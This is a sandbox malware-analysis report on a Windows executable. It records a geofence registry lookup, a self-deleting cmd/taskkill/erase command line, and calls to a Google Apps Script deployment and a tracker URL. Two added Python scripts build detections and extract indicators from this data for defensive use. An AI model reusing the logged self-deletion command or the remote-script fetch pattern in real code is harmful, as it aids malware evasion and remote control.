Analysis
  max time kernel: 122s
  max time network: 158s
  platform: windows10-2004_x64
  resource: win10v2004-20230915-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 13-10-2023 04:59
Static task: static1
Behavioral task: behavioral1
  Sample: f8d48f85213d887e26593cbf8289bbea.exe
  Resource: win7-20230831-en
Behavioral task: behavioral2
  Sample: f8d48f85213d887e26593cbf8289bbea.exe
  Resource: win10v2004-20230915-en
General
  Target: f8d48f85213d887e26593cbf8289bbea.exe
  Size: 338KB
  MD5: f8d48f85213d887e26593cbf8289bbea
  SHA1: 033a2268f2d5c0cfe36b0b349c625755e1df54d4
  SHA256: a82cff6bab731179fbc7be78fccab6bbf690aef5978b0ea489840b2e10fc3df5
  SHA512: c88bbde4590383932485dc1fa1d09302d58138c58baeed858fee54fd978184921ae65ef822f4781dd52f44716b3715705f3778bfca03fe1d7b577b790bd5d2ed
  SSDEEP: 6144:iew5vMsL1OLtun0ZB6rs71LH1i9DZ0yt5:iR1LUd6rw1LHSDq4
Malware Config
  (no configuration extracted)

Signatures

Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Process                               Key/value queried
  f8d48f85213d887e26593cbf8289bbea.exe  \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Program crash (1 IoC)
  pid   pid_target  Process       procid_target
  3608  3416        WerFault.exe  25

Kills process with taskkill (1 IoC)
  pid   Process
  3652  taskkill.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
  description              pid   Process
  Token: SeDebugPrivilege  3652  taskkill.exe

Suspicious use of WriteProcessMemory (6 IoCs)
  description                       pid   Process                               procid_target
  PID 3416 wrote to memory of 4464  3416  f8d48f85213d887e26593cbf8289bbea.exe  94
  PID 3416 wrote to memory of 4464  3416  f8d48f85213d887e26593cbf8289bbea.exe  94
  PID 3416 wrote to memory of 4464  3416  f8d48f85213d887e26593cbf8289bbea.exe  94
  PID 4464 wrote to memory of 3652  4464  cmd.exe                               97
  PID 4464 wrote to memory of 3652  4464  cmd.exe                               97
  PID 4464 wrote to memory of 3652  4464  cmd.exe                               97
  Note: every entry is a parent writing into a child it has just created (3416 -> 4464, 4464 -> 3652), which CreateProcess does while setting up the new process; on its own this is not evidence of injection into an unrelated process.
Processes

1. C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe"
   PID: 3416
   - Checks computer location settings
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c taskkill /im "f8d48f85213d887e26593cbf8289bbea.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe" & exit
      PID: 4464
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SysWOW64\taskkill.exe
         Command line: taskkill /im "f8d48f85213d887e26593cbf8289bbea.exe" /f
         PID: 3652
         - Kills process with taskkill
         - Suspicious use of AdjustPrivilegeToken
   2. C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1880
      PID: 3608
      - Program crash
1. C:\Windows\SysWOW64\WerFault.exe
   Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3416 -ip 3416
   PID: 4444

Note: the sample is 32-bit (resource tag arch:x86), so the literal System32 path in the cmd.exe command line resolves to SysWOW64 through WOW64 file system redirection; the image path and the command line therefore differ, and detection logic should match on the image name rather than the full path. The cmd.exe child kills the sample's own image and then erases the file from %TEMP% (a self-deletion routine). WerFault.exe is also reporting a crash of the same PID (3416); the report does not show whether the crash came before or after the taskkill.
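The following Python is an added example, not part of this report or the sandbox vendor's tooling. It runs a detection for the self-deletion chain and for the Geo\Nation registry lookup over constructed process-creation and registry-query records modelled on the process tree and signatures above (the record fields pid/ppid/image/cmdline and pid/key are an assumed Sysmon-like shape, and the benign control records are constructed). It compares image basenames rather than full paths because a 32-bit parent spawns cmd.exe from SysWOW64 even when its command line says System32.

```python
"""Detect the self-deletion chain and the Geo\\Nation registry lookup from
this report over constructed telemetry.

Added example for this page (not the sandbox vendor's or the sample's code).
Assumptions: records are dicts with pid/ppid/image/cmdline (process creation)
and pid/key (registry value query), a Sysmon-like shape; the sample records
below are constructed from the process tree and signatures above, plus one
benign control."""

import ntpath
import re

# `taskkill [/f] /im "<image>" ...` -> the image name being killed
TASKKILL_RE = re.compile(r'\btaskkill\b[^&]*?/im\s+"?([^"\s]+)"?', re.IGNORECASE)
# `erase|del [/switches] "<path>"` up to the next `&` -> the path being deleted
ERASE_RE = re.compile(r'\b(?:erase|del)\b(?:\s+/[a-z])*\s+"?([^"&]+?)"?\s*(?:&|$)',
                      re.IGNORECASE)
GEO_NATION_SUFFIX = r"\control panel\international\geo\nation"

# Constructed from the process tree above (ppid 0 = launched by the sandbox).
PROCS = [
    {"pid": 3416, "ppid": 0,
     "image": r"C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe",
     "cmdline": r'"C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe"'},
    {"pid": 4464, "ppid": 3416, "image": r"C:\Windows\SysWOW64\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c taskkill /im "f8d48f85213d887e26593cbf8289bbea.exe" /f '
                r'& erase "C:\Users\Admin\AppData\Local\Temp\f8d48f85213d887e26593cbf8289bbea.exe" & exit'},
    {"pid": 3652, "ppid": 4464, "image": r"C:\Windows\SysWOW64\taskkill.exe",
     "cmdline": r'taskkill /im "f8d48f85213d887e26593cbf8289bbea.exe" /f'},
    {"pid": 3608, "ppid": 3416, "image": r"C:\Windows\SysWOW64\WerFault.exe",
     "cmdline": r"C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1880"},
    # Benign control (constructed): an installer deleting its log, not itself.
    {"pid": 5000, "ppid": 0, "image": r"C:\Users\Admin\Downloads\setup.exe",
     "cmdline": r'"C:\Users\Admin\Downloads\setup.exe"'},
    {"pid": 5001, "ppid": 5000, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c del /q "C:\Users\Admin\AppData\Local\Temp\setup.log" & exit'},
]

# Constructed from the "Checks computer location settings" signature above,
# plus one unrelated query from the benign control.
REG_EVENTS = [
    {"pid": 3416, "key": r"\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation"},
    {"pid": 5000, "key": r"\REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Software\Microsoft\Windows\CurrentVersion\Run"},
]


def find_self_delete(procs):
    """cmd.exe children whose command line deletes the parent's own image.

    Image names are compared by basename: a 32-bit parent spawns
    C:\\Windows\\SysWOW64\\cmd.exe even when its command line says System32
    (WOW64 file system redirection), so full-path equality would miss it.
    """
    by_pid = {p["pid"]: p for p in procs}
    hits = []
    for p in procs:
        if ntpath.basename(p["image"]).lower() != "cmd.exe":
            continue
        parent = by_pid.get(p["ppid"])
        erase = ERASE_RE.search(p["cmdline"])
        if parent is None or erase is None:
            continue
        if erase.group(1).strip().lower() != parent["image"].lower():
            continue  # deletes something, but not its own parent
        kill = TASKKILL_RE.search(p["cmdline"])
        hits.append({
            "parent_pid": parent["pid"],
            "cmd_pid": p["pid"],
            "deleted": parent["image"],
            # True when the same line also kills the parent's image first
            "kills_self": bool(kill) and (kill.group(1).lower() == ntpath.basename(parent["image"]).lower()),
        })
    return hits


def find_geofence_lookups(reg_events):
    """Queries of HKCU\\Control Panel\\International\\Geo\\Nation.

    Weak evidence on its own (installers and browsers read it too); it gains
    weight when the same pid also appears in find_self_delete().
    """
    return [e for e in reg_events if e["key"].lower().endswith(GEO_NATION_SUFFIX)]


if __name__ == "__main__":
    for h in find_self_delete(PROCS):
        print("self-delete:", h)
    for e in find_geofence_lookups(REG_EVENTS):
        print("geofence lookup by pid", e["pid"])
```

Run against the constructed records the self-delete detector returns a single hit (parent 3416, cmd 4464, kills_self true) and ignores the installer that deletes only its log; the geofence check returns only pid 3416.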
Network

DNS (all queries to 8.8.8.8:53)
  PTR 8.8.8.8.in-addr.arpa -> dns.google
  PTR 2.136.104.51.in-addr.arpa -> (empty response)
  PTR 8.3.197.209.in-addr.arpa -> vip0x008.map2.ssl.hwcdn.net
  PTR 72.32.126.40.in-addr.arpa -> (empty response)
  PTR 108.211.229.192.in-addr.arpa -> (empty response)
  PTR 26.165.165.52.in-addr.arpa -> (empty response)
  PTR 18.31.95.13.in-addr.arpa -> (empty response)
  PTR 254.7.248.8.in-addr.arpa -> (empty response)
  A script.google.com -> 172.217.23.206
  Note: process attribution is recorded only for the HTTP exchanges below; the DNS lookups are not tied to a PID in this report.

HTTP exchange 1: process f8d48f85213d887e26593cbf8289bbea.exe -> 172.217.23.206:80
  GET http://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222&param=empty
  Request:
    GET /macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222&param=empty HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Host: script.google.com
  Response:
    HTTP/1.1 301 Moved Permanently
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 18 Oct 2023 03:31:17 GMT
    Location: https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222&param=empty
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Security-Policy: frame-ancestors 'self'
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Accept-Ranges: none
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
  Note: the request carries no User-Agent header and sends a form Content-Type on a GET with no body; both are usable as detection features. The query string contains literal placeholder values (ip=NOIP, param=empty) rather than collected data.

HTTP exchange 2: process f8d48f85213d887e26593cbf8289bbea.exe -> 172.217.23.206:443
  GET https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222&param=empty
  Request:
    GET /macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222&param=empty HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Host: script.google.com
  Response:
    HTTP/1.1 302 Moved Temporarily
    Access-Control-Allow-Origin: *
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 18 Oct 2023 03:31:19 GMT
    Location: https://script.googleusercontent.com/macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Security-Policy: frame-ancestors 'self'
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Accept-Ranges: none
    Vary: Accept-Encoding
    Transfer-Encoding: chunked
  Note: Apps Script web apps serve their output through a 302 to script.googleusercontent.com/macros/echo, so the content-bearing request is the next exchange, on a different host. Blocking or alerting on script.google.com alone does not cover it; the deployment id in the /macros/s/<id>/exec path is the durable indicator.

DNS (8.8.8.8:53)
  PTR 206.23.217.172.in-addr.arpa -> prg03s05-in-f14.1e100.net, prg03s05-in-f206.1e100.net, ams16s37-in-f14.1e100.net
  A script.googleusercontent.com -> CNAME googlehosted.l.googleusercontent.com -> A 142.251.36.1

HTTP exchange 3: process f8d48f85213d887e26593cbf8289bbea.exe -> 142.251.36.1:443
  GET https://script.googleusercontent.com/macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D
  Request:
    GET /macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Host: script.googleusercontent.com
  Response:
    HTTP/1.1 200 OK
    Access-Control-Allow-Origin: *
    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
    Pragma: no-cache
    Expires: Mon, 01 Jan 1990 00:00:00 GMT
    Date: Wed, 18 Oct 2023 03:31:19 GMT
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Security-Policy: frame-ancestors 'self'
    X-XSS-Protection: 1; mode=block
    Server: GSE
    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    Accept-Ranges: none
    Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding
    Transfer-Encoding: chunked
  Note: this is the request that actually returns the script's output; the response body (chunked, 10.5 kB received on this flow) is not included in this report, so what the sample fetched is not shown here.

DNS (8.8.8.8:53)
  A trk.srcstat.com -> CNAME xxe82.bmtrck.com -> A 3.70.16.242

HTTP exchange 4: process f8d48f85213d887e26593cbf8289bbea.exe -> 3.70.16.242:80
  GET http://trk.srcstat.com/postback?cid=REPLACE&payout=OPTIONAL&txid=OPTIONAL
  Request:
    GET /postback?cid=REPLACE&payout=OPTIONAL&txid=OPTIONAL HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Host: trk.srcstat.com
  Response:
    HTTP/1.1 400 Bad Request
    Date: Wed, 18 Oct 2023 03:31:19 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 134
    Connection: keep-alive
    accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Bitness,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Full-Version,Sec-CH-UA-Mobile,Sec-CH-UA-Platform,Sec-CH-UA-Model,Sec-CH-UA-Platform-Version,Sec-CH-UA-Reduced
    Access-Control-Allow-Origin: *
    ETag: W/"86-W1anoWM3jbC0X5xVlSksmemF4cY"
    X-Response-Time: 3.511ms
  Note: the query string is an unfilled tracking postback template (cid=REPLACE, payout=OPTIONAL, txid=OPTIONAL), and the tracker rejected it with 400; the 134-byte HTML body is not included in this report.

DNS (8.8.8.8:53)
  PTR 1.36.251.142.in-addr.arpa -> ams15s44-in-f1.1e100.net
  PTR 242.16.70.3.in-addr.arpa -> ec2-3-70-16-242.eu-central-1.compute.amazonaws.com
  PTR 131.109.69.13.in-addr.arpa -> (empty response)

Flows (bytes sent / bytes received, packets out / in)
  9 flows whose remote address, protocol and process are not recorded in this report: 260 B / 200 B, 5 / 5 each

HTTP flows (bytes sent / bytes received, packets out / in)
  172.217.23.206:80    http       f8d48f85213d887e26593cbf8289bbea.exe   481 B / 1.2 kB    5 / 4
    GET http://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222&param=empty -> 301
  172.217.23.206:443   tls, http  f8d48f85213d887e26593cbf8289bbea.exe   1.0 kB / 9.2 kB   10 / 13
    GET https://script.google.com/macros/s/AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec?xfgnxfgn&stream=5&ip=NOIP&slots=2222&param=empty -> 302
  142.251.36.1:443     tls, http  f8d48f85213d887e26593cbf8289bbea.exe   1.3 kB / 10.5 kB  10 / 13
    GET https://script.googleusercontent.com/macros/echo?user_content_key=LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D -> 200
  3.70.16.242:80       http       f8d48f85213d887e26593cbf8289bbea.exe   440 B / 778 B     6 / 4
    GET http://trk.srcstat.com/postback?cid=REPLACE&payout=OPTIONAL&txid=OPTIONAL -> 400

DNS flows (to 8.8.8.8:53; bytes sent / bytes received, packets out / in)
  Query                          Answer             Sent   Recv    Pkts
  8.8.8.8.in-addr.arpa           (PTR)              66 B   90 B    1 / 1
  2.136.104.51.in-addr.arpa      (PTR)              71 B   157 B   1 / 1
  8.3.197.209.in-addr.arpa       (PTR)              70 B   111 B   1 / 1
  72.32.126.40.in-addr.arpa      (PTR)              71 B   157 B   1 / 1
  108.211.229.192.in-addr.arpa   (PTR)              74 B   145 B   1 / 1
  26.165.165.52.in-addr.arpa     (PTR)              72 B   146 B   1 / 1
  18.31.95.13.in-addr.arpa       (PTR)              70 B   144 B   1 / 1
  254.7.248.8.in-addr.arpa       (PTR)              70 B   124 B   1 / 1
  script.google.com              A 172.217.23.206   63 B   79 B    1 / 1
  206.23.217.172.in-addr.arpa    (PTR)              73 B   173 B   1 / 1
  script.googleusercontent.com   A 142.251.36.1     74 B   119 B   1 / 1
  trk.srcstat.com                A 3.70.16.242      61 B   104 B   1 / 1
  1.36.251.142.in-addr.arpa      (PTR)              71 B   109 B   1 / 1
  242.16.70.3.in-addr.arpa       (PTR)              70 B   134 B   1 / 1
  131.109.69.13.in-addr.arpa     (PTR)              72 B   146 B   1 / 1
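The HTTP section above shows a three-hop Apps Script chain (plain-HTTP request, 301 to HTTPS, 302 to script.googleusercontent.com/macros/echo) followed by a rejected tracker postback. The following Python is an added example, not part of this report or the sandbox vendor's tooling: it reconstructs that chain from the logged request URLs, status codes and Location headers, pulls out the indicators worth keeping (hosts, the Apps Script deployment id, the final content URL) and flags query parameters that are literal template placeholders. EXCHANGES is constructed from the report; the response bodies were not captured, so they are not modelled.

```python
"""Follow the redirect chain and extract IoCs from the HTTP exchanges in this
report. Added example for this page (not the sandbox vendor's or the sample
author's code). EXCHANGES is constructed from the HTTP section above: request
URL, status code and Location header; the response bodies were not captured
in the report, so none are modelled."""

import re
from urllib.parse import parse_qsl, urlsplit

# Apps Script web-app deployment id: /macros/s/<id>/exec
DEPLOY_ID_RE = re.compile(r"/macros/s/([A-Za-z0-9_-]+)/exec")

# Literal values seen in this sample's query strings that read as an
# unfilled template rather than collected data.
PLACEHOLDER_VALUES = {"REPLACE", "OPTIONAL", "NOIP", "empty"}

SCRIPT_URL = ("https://script.google.com/macros/s/"
              "AKfycbxu6XZln0F2VKs8FMpn924RlKozFV5XZApwvto57voh-zMdTnkCnYo38kxDLRAyW0hb/exec"
              "?xfgnxfgn&stream=5&ip=NOIP&slots=2222&param=empty")
ECHO_URL = ("https://script.googleusercontent.com/macros/echo?user_content_key="
            "LNXWMrdWN6ZYOWDHMAtSe_YWxqkkvbDjxK2eI2pgBj8YMAIlZyu3GE8GykcoESaC6avrDKoaQx-p-sQ0JUV0hkTOReBTPCeuOJmA1Yb3SEsKFZqtv3DaNYcMrmhZHmUMWojr9NvTBuBLhyHCd5hHa_kSw3KJAyZKK3RTU5bpIFQ10ckTyHVSt1vTS5MZ6zqvS4V0cmy1dEEXVXg5zXDjcYCeAylu8DyVhn7i0fteRV_StcynBwb4deQK9NYe9nyjGugVZE-wIMxqgQX8JhELwW1HKFlogGMzl5YZMv-zanmfUJ0nV5QOX3d-7DXRm3Ta"
            "&lib=MAg_X_j8YJSR0PZgL-LNb21v93CYKtC0D")
POSTBACK_URL = "http://trk.srcstat.com/postback?cid=REPLACE&payout=OPTIONAL&txid=OPTIONAL"

# Constructed from the report (url, status, Location), in the order observed.
EXCHANGES = [
    {"url": SCRIPT_URL.replace("https://", "http://", 1), "status": 301, "location": SCRIPT_URL},
    {"url": SCRIPT_URL, "status": 302, "location": ECHO_URL},
    {"url": ECHO_URL, "status": 200, "location": None},
    {"url": POSTBACK_URL, "status": 400, "location": None},
]


def follow_chain(exchanges, start_url, max_hops=10):
    """Walk Location headers from start_url, pairing each hop with the logged
    exchange for that URL. Stops at the first non-3xx response, at a redirect
    target the process never requested, or after max_hops."""
    by_url = {e["url"]: e for e in exchanges}
    hops, url = [], start_url
    for _ in range(max_hops):
        ex = by_url.get(url)
        if ex is None:
            break
        hops.append({"url": url, "host": urlsplit(url).hostname, "status": ex["status"]})
        if not (300 <= ex["status"] < 400 and ex["location"]):
            break
        url = ex["location"]
    return hops


def apps_script_deployment_id(url):
    """The deployment id is the durable indicator: script.google.com itself
    cannot be blocked wholesale, but this path can."""
    m = DEPLOY_ID_RE.search(urlsplit(url).path)
    return m.group(1) if m else None


def placeholder_params(url):
    """Query parameters whose value is a literal template placeholder."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return {k: v for k, v in pairs if v in PLACEHOLDER_VALUES}


def extract_iocs(exchanges):
    """Hosts contacted, Apps Script deployment ids and the URL that finally
    answered with content (the end of the redirect chain from the first request)."""
    hosts, ids, final = set(), set(), None
    for e in exchanges:
        hosts.add(urlsplit(e["url"]).hostname)
        did = apps_script_deployment_id(e["url"])
        if did:
            ids.add(did)
    chain = follow_chain(exchanges, exchanges[0]["url"])
    if chain:
        final = chain[-1]["url"]
    return {"hosts": sorted(hosts), "apps_script_deployment_ids": sorted(ids),
            "content_url": final}


if __name__ == "__main__":
    for hop in follow_chain(EXCHANGES, EXCHANGES[0]["url"]):
        print(hop["status"], hop["host"])
    print(extract_iocs(EXCHANGES))
    print("postback placeholders:", placeholder_params(POSTBACK_URL))
```

On the constructed exchanges the chain resolves to 301 -> 302 -> 200 ending on script.googleusercontent.com, the postback is a single 400 hop with every parameter flagged as a placeholder, and the Apps Script request is flagged for ip=NOIP and param=empty.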